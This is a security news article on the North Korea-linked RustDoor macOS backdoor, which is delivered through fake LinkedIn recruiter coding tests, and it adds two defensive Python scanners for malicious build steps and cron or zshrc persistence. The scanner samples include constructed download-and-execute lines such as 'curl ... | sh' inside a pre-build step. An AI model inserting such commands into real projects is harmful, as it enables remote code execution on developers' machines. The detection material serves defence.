RustDoor Malware macOS Backdoor Targeting Crypto Industry on LinkedIn.

“Stay Alert: North Korean Cyber Threats Loom on LinkedIn, Targeting Crypto and DeFi Sectors with RustDoor Malware”

Understanding RustDoor: North Korea’s Latest Cyber Threat via LinkedIn and Its Impact on Cryptocurrency Sectors

Cybersecurity researchers are sounding the alarm about sophisticated attempts by North Korean threat actors to target unsuspecting victims on LinkedIn. These attackers masquerade as recruiters from legitimate businesses, such as the decentralized cryptocurrency exchange STON.fi, only to deliver a dangerous malware known as RustDoor.

This alarming trend is part of a broader, multi-pronged campaign by cyber operatives backed by the Democratic People’s Republic of Korea (DPRK). Their process involves infiltrating networks of interest under the guise of conducting job interviews or coding assignments. The financial and cryptocurrency sectors, rich in digital assets and sensitive information, are particularly lucrative targets for these state-sponsored adversaries. Their goal? To generate illicit revenue and fulfill objectives that align with the regime’s strategic interests.

The U.S. Federal Bureau of Investigation (FBI) recently highlighted these “highly tailored, difficult-to-detect social engineering campaigns” aimed at employees within the decentralized finance (DeFi) and cryptocurrency industries. One common tactic includes requests to execute code or download applications on devices that have access to a company’s internal network. Another red flag is the solicitation to complete a ‘pre-employment test’ or debugging exercise involving non-standard or unfamiliar Node.js packages, PyPI packages, scripts, or GitHub repositories.

These tactics have been extensively documented in recent weeks, showcasing a disturbing evolution in the tools and methods used by these threat actors. The latest attack chain identified by Jamf Threat Labs involves deceiving the victim into downloading a compromised Visual Studio project. This project appears to be part of a coding challenge but is actually embedded with bash commands designed to download two different second-stage payloads, both functioning identically as RustDoor.
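Because the dropper described here arrives as a "coding challenge" project whose build steps run shell commands, a practical pre-flight check is to grep the unpacked project for download-and-execute idioms before opening it in an IDE. The following scanner is an added example written for this article; it is not Jamf's tooling or the sample's actual build file. The MSBuild `<Exec Command="..."/>` pre-build step in the sample is constructed for illustration, and the patterns are heuristics that flag common drop-and-run idioms, not a signature for RustDoor.

```python
import os
import re
from typing import List, Tuple

# Idioms a legitimate take-home exercise rarely needs in its build steps:
# a download piped straight into a shell, decode-then-execute, and
# detaching a process into the background. Heuristic only (assumption).
SUSPICIOUS_PATTERNS = [
    ("download piped to shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b")),
    ("decode piped to shell", re.compile(r"\bbase64\b[^|\n]*\|\s*(ba|z)?sh\b")),
    ("chmod then execute", re.compile(r"\bchmod\s+\+x\s+(\S+).*?(&&|;)\s*\1\b")),
    ("background launch", re.compile(r"\bnohup\b|\bdisown\b")),
]

Finding = Tuple[str, int, str, str]  # (path, line number, label, offending line)


def scan_text(text: str, path: str = "<inline>") -> List[Finding]:
    """Return one finding per line that matches any suspicious pattern."""
    findings: List[Finding] = []
    for no, line in enumerate(text.splitlines(), start=1):
        for label, pat in SUSPICIOUS_PATTERNS:
            if pat.search(line):
                findings.append((path, no, label, line.strip()))
                break  # one label per line is enough for triage
    return findings


def scan_project(root: str, max_bytes: int = 2_000_000) -> List[Finding]:
    """Walk an unpacked project tree and scan every readable text file."""
    findings: List[Finding] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, encoding="utf-8", errors="strict") as fh:
                    text = fh.read()
            except (OSError, UnicodeDecodeError):
                continue  # binary or unreadable: not a build script
            findings.extend(scan_text(text, path))
    return findings


# Constructed sample of an MSBuild project with a pre-build step
# (illustrative only; not the real dropper's project file).
SAMPLE_PROJECT_FILE = """\
<Project Sdk="Microsoft.NET.Sdk">
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="dotnet --version" />
    <Exec Command="curl -s https://example.invalid/stage2 | sh" />
    <Exec Command="echo aGVsbG8= | base64 -d | zsh" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for path, no, label, line in scan_text(SAMPLE_PROJECT_FILE, "sample.csproj"):
        print(f"{path}:{no}: {label}: {line}")
```

Run `scan_project("/path/to/unpacked/project")` on a real archive; any hit is reason to stop and ask why a coding test needs to fetch and execute remote content during a build.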

Interestingly, when this zipped coding test file was uploaded to the VirusTotal platform on August 7, 2024, none of the anti-malware engines flagged it as malicious. This indicates a sophisticated level of obfuscation that could bypass traditional antivirus solutions. According to researchers Jaron Bradley and Ferdous Saljooki, “The config files embedded within the two separate malware samples show that VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file.”
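The two persistence mechanisms the researchers name, a cron job and an entry in `.zshrc`, are both plain text on the host, so an analyst can triage them without any endpoint agent. The script below is an added example for this article, not Jamf's or Bitdefender's code: it parses the output of `crontab -l` and the contents of `~/.zshrc` and flags commands that reference the payload names quoted above, that execute from user-writable locations (temp directories, the user's `Library`, hidden home directories, `Downloads`), or that detach into the background. The sample crontab and `.zshrc` contents, the `/Users/dev` home directory and the file paths in them are constructed for the demonstration and are not the paths the real samples use.

```python
import re
from typing import List, Tuple

# Payload names quoted from the Jamf findings; the location heuristics
# below are assumptions about where a user-level dropper tends to live.
REPORTED_NAMES = ("VisualStudioHelper", "zsh_env")
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")

Finding = Tuple[str, int, str, str]  # (source, line number, reason, line)


def _expand(token: str, home: str) -> str:
    """Resolve ~ and $HOME so both spellings are judged the same way."""
    if token.startswith("~/"):
        return home + token[1:]
    if token.startswith("$HOME/"):
        return home + token[5:]
    return token


def _unusual_path(token: str, home: str) -> bool:
    """True for executables under temp dirs, ~/Library, hidden home dirs or Downloads."""
    p = _expand(token, home)
    if p.startswith(TEMP_PREFIXES):
        return True
    if p.startswith(home + "/"):
        rel = p[len(home) + 1:]
        return rel.startswith((".", "Library/", "Downloads/", "Public/"))
    return False


def _check_command(cmd: str, home: str) -> List[str]:
    """Collect every reason a command line deserves a second look."""
    reasons = []
    if any(name in cmd for name in REPORTED_NAMES):
        reasons.append("references a payload name from the report")
    for tok in re.findall(r"(?:~|\$HOME|/)[^\s;&|'\"]+", cmd):
        if _unusual_path(tok, home):
            reasons.append(f"executes from user-writable location: {tok}")
            break
    if re.search(r"\bnohup\b|\bdisown\b|&\s*$", cmd):
        reasons.append("detaches into the background")
    return reasons


def audit_crontab(text: str, home: str) -> List[Finding]:
    """Parse crontab -l output; skip comments, blanks and VAR=value lines."""
    findings: List[Finding] = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        special = line.startswith("@")            # @reboot, @daily, ...
        parts = line.split(None, 1 if special else 5)
        if len(parts) < (2 if special else 6):
            continue                              # malformed; nothing to run
        for reason in _check_command(parts[-1], home):
            findings.append(("crontab", no, reason, line))
    return findings


def audit_zshrc(text: str, home: str) -> List[Finding]:
    """Flag lines in .zshrc that execute something; exports/aliases run nothing."""
    findings: List[Finding] = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^(export\s+)?[A-Za-z_]\w*=", line) or line.startswith("alias "):
            continue
        for reason in _check_command(line, home):
            findings.append((".zshrc", no, reason, line))
    return findings


def audit_persistence(crontab_text: str, zshrc_text: str, home: str) -> List[Finding]:
    return audit_crontab(crontab_text, home) + audit_zshrc(zshrc_text, home)


# Constructed samples (not real artifacts): one benign and one suspicious entry each.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
*/5 * * * * /Users/dev/Library/Caches/VisualStudioHelper >/dev/null 2>&1
"""
SAMPLE_ZSHRC = """\
export PATH="$HOME/.cargo/bin:$PATH"
alias ll='ls -la'
eval "$(/opt/homebrew/bin/brew shellenv)"
nohup /Users/dev/.config/zsh_env >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for source, no, reason, line in audit_persistence(SAMPLE_CRONTAB, SAMPLE_ZSHRC, "/Users/dev"):
        print(f"{source}:{no}: {reason}: {line}")
```

On a live host feed it `subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout` and the text of `~/.zshrc` with the real home directory. Dotfile managers that `source` files from hidden directories will also show up; the point is a short list an analyst can review by hand, not a verdict.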

RustDoor, initially documented by Bitdefender in February 2024 targeting cryptocurrency firms, is a macOS backdoor written in Objective-C. A subsequent analysis revealed a Golang variant named GateDoor intended for Windows machines. The findings from Jamf are particularly significant as they mark the first formal attribution of this malware to North Korean threat actors.

Moreover, VisualStudioHelper is designed not only as a backdoor but also as an information stealer. It prompts the user to enter their system password under the guise of a request from the Visual Studio app—a clever trick to avoid raising suspicions while harvesting specified files from the victim’s system.

Both payloads maintain communication with their command-and-control servers using different methods, underscoring the sophisticated nature of this cyber espionage operation. As these threat actors continue to refine their strategies to target individuals in the crypto industry, it becomes crucial for companies to train their employees—including developers—to be wary of unsolicited contacts on social media asking them to run software.

These social engineering schemes orchestrated by DPRK are not only well-crafted but also executed by individuals who are proficient in English and have done their homework on their targets. This makes them particularly dangerous and difficult to detect, leaving many professionals in the cryptocurrency sector vulnerable to exploitation.
